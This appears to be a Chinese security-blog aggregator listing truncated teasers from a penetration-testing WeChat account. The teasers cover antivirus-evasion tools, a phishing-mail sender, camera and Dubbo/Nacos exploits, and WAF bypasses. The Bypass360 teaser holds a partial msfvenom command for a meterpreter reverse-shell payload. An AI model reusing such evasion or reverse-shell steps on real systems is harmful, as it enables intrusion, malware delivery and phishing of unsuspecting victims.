【免杀工具】killEscaper过360，火绒检测 点击蓝字，关注我们Github项目：https://github.com/Anyyy111/killEscaper声明：本工具仅供以安全为目的的学习交流使用，任何人不得将其用于非法用途以及盈利等目的，... 2023-6-9 22:2:34 | 阅读: 39 | 收藏 | 渗透安全团队 shellcode killescaper python 免杀 渗透

GUI钓鱼邮件便捷发送 | 工具 工具简介钓鱼邮件便捷发送工具（GUI），本程序利用Python语言编写，使用Tkinter实现图形化界面，可使用Pyinstaller进行exe打包，程序主界面截图如下：功能简介1、支持腾讯企业邮、网... 2023-6-9 22:2:28 | 阅读: 20 | 收藏 | 渗透安全团队 钓鱼 渗透 安全 eml 发件

工具 | 摄像头漏洞渗透和利用总结 批量扫描破解海康威视、大华等摄像头的常见漏洞、弱密码地址：https://github.com/WhaleFell/CameraHack海康威视RCE漏洞 批量检测和利用工具地址：https://gi... 2023-6-8 22:43:37 | 阅读: 59 | 收藏 | 渗透安全团队 渗透 安全 github 漏洞 海康

实战 | 新手任意用户密码修改漏洞 一 前言 学习网络安全已经两个月了，第一次挖洞，技术含量不高，大牛可以跳过，主要分享下思路，希望可以结交更多的小伙伴，有圈内人员可以拉下弟弟进个学习群啥的（圈外人员的梦想） 二 发现过程 此漏洞是我... 2023-6-8 22:43:31 | 阅读: 22 | 收藏 | 渗透安全团队 账号 漏洞 渗透 爆破 申诉

多层代理解决Web测试中遇到的抓包问题 由于微信公众号推送机制改变了，快来星标不再迷路，谢谢大家！背景测试的web项目是外部网站，需要挂socks代理才能访，但是通过burp配置好之其他网站均能正常抓包，唯独项目网站抓不到包问题开始时使用c... 2023-6-7 22:56:2 | 阅读: 41 | 收藏 | 渗透安全团队 代理 proxy burp clashx 渗透

渗透扫描APP漏洞的平台 | 工具 由于微信公众号推送机制改变了，快来星标不再迷路，谢谢大家！第一次接触MobSF，还是在实习工作中，来了个APP渗透的活，那时候还不太了解，领导说，直接拿MobSF扫描一下不就好了，后来一用就变成了常用... 2023-6-7 22:55:57 | 阅读: 25 | 收藏 | 渗透安全团队 mobsf 渗透 security 安全

Bypass360 | 工具(近期更新) 0x01 工具介绍绕过360工具。0x02 安装与使用1、生成shellcode：msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.1... 2023-6-6 22:42:23 | 阅读: 46 | 收藏 | 渗透安全团队 渗透 shellcode 安全 绕过 hpp0x03

【干货】渗透过程中为什么我们需要收集URL? Next Generation HTTP Dir/File Fuzz Tool: https://github.com/chainreactors/sprayFast passive URL enum... 2023-6-6 22:42:17 | 阅读: 39 | 收藏 | 渗透安全团队 爆破 github 自动化 信息 php

【干货】绕过WAF的常用5种方法 WAF是一种用于过滤和阻止恶意网络流量的网络安全解决方案。国外网站常见的供应商包括CloudFlare、AWS、Citrix、Akamai、Radware、Microsoft Azure和Barrac... 2023-6-5 20:21:55 | 阅读: 23 | 收藏 | 渗透安全团队 防火墙 payload 绕过 网络 nmap

【工具 】提取Windows主机部分日志和cmdkey | SharpWinLog 鸣谢：@uknowsec师傅。本工具由@uknowsec师傅的SharpEventLog修改而来，不足之处欢迎师傅们指点和纠正，感激不尽。介绍原来的的项目旨在提取中文语言的Windows系统中与登录失... 2023-6-5 20:21:51 | 阅读: 20 | 收藏 | 渗透安全团队 sharpwinlog 渗透 信息 windows 安全

【漏洞】NPS代理反制绕过登陆验证复现 由于微信公众号推送机制改变了，快来星标不再迷路，谢谢大家！NPS- 一款轻量级、高性能、功能强大的内网穿透代理服务器1.前言看了师傅的一个文章，感觉挺有意思的，尝试记录下来，结尾有"惊吓"GitHub... 2023-6-4 21:7:50 | 阅读: 594 | 收藏 | 渗透安全团队 nps 绕过 加密 crypt

Dubbo 3.x命令执行利用工具(CVE-2023-23638) 由于微信公众号推送机制改变了，快来星标不再迷路，谢谢大家！工具说明本工具支持CVE-2023-23638在Dubbo 3.x的完整利用，覆盖服务发现到漏洞利用及回显。在Dubbo 2.x版本也可以利用... 2023-6-4 21:7:45 | 阅读: 26 | 收藏 | 渗透安全团队 漏洞 渗透 安全 谢谢 dubbo

靶场实操-从joomla到拿下域控 访问网站主页，是一个博客网站常规的目录扫描这里发现一个疑似后台地址，访问http://192.168.2.252/administrator/为 joomla 站点，印象中记得有rce的漏洞，上网寻找... 2023-6-3 00:1:43 | 阅读: 17 | 收藏 | 渗透安全团队 lsa security 渗透 dirty 1472

工具 | 通达OA漏洞检测 由于微信公众号推送机制改变了，快来星标不再迷路，谢谢大家！0x01 工具介绍通达OA漏洞检测工具-TongdaScan_go，支持检测： 通达OA v2014 get_contactlist.php... 2023-6-1 22:46:25 | 阅读: 27 | 收藏 | 渗透安全团队 通达 php v11 漏洞 安全

绕过W*S-WAF的MSSQL注入 由于微信公众号推送机制改变了，快来星标不再迷路，谢谢大家！绕过W*S-WAF的MSSQL注入    目录○ 第一个网站    ◇ 确定列数与显示位    ◇ 查库名    ◇ 查表名    ◇ 查列名... 2023-6-1 22:46:19 | 阅读: 19 | 收藏 | 渗透安全团队 列名 数据 绕过 payload 渗透

实战 | 某新疆职业技术学院逻辑漏洞 免责声明由于传播、利用本公众号狐狸说安全所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，公众号狐狸说安全及作者不为此承担任何责任，一旦造成后果请自行承担！如有侵权烦请告知，我们会... 2023-5-31 22:44:43 | 阅读: 88 | 收藏 | 渗透安全团队 账号 信息 inurl 安全

【漏洞复现】Nacos存在SQL注入漏洞 简介Nacos 是阿里的开源项目，应用于微服务，微服务是将单体应用拆分成一个个服务节点，nacos主要功能是服务发现和微服务的配置集中管理。Nacos一、漏洞详情源码地址：https://github... 2023-5-31 22:44:38 | 阅读: 329 | 收藏 | 渗透安全团队 nacos alibaba 渗透

某X CMS任意文件上传、删除、XSS漏洞挖掘 由于微信公众号推送机制改变了，快来星标不再迷路，谢谢大家！死学没用，劳逸结合，玩累了再学。不经过任何过滤，张口就来，反射XSS<?php if ($_GET['art']): ?><dd><span... 2023-5-31 00:0:39 | 阅读: 20 | 收藏 | 渗透安全团队 tpl 渗透 maxsize

API接口安全测试大全（一键扫描工具） 由于微信公众号推送机制改变了，快来星标不再迷路，谢谢大家！0x00 api接口介绍通常在网站的通讯中，很多会调用api接口去方便更多信息的管理与调用，但是当使用某些api时，在开发人员未对api接口做... 2023-5-31 00:0:35 | 阅读: 123 | 收藏 | 渗透安全团队 swagger 信息 注入 安全 漏洞

漏洞扫描 | Xray图形化 - 更新 由于微信公众号推送机制改变了，快来星标不再迷路，谢谢大家！0x01 工具介绍xray 是一款优秀的漏洞扫描工具，但目前只有命令行版本，通过 config.yaml 配置文件启动，很多情况下不好上手，需... 2023-5-29 20:3:21 | 阅读: 35 | 收藏 | 渗透安全团队 渗透 安全 xray 谢谢 漏洞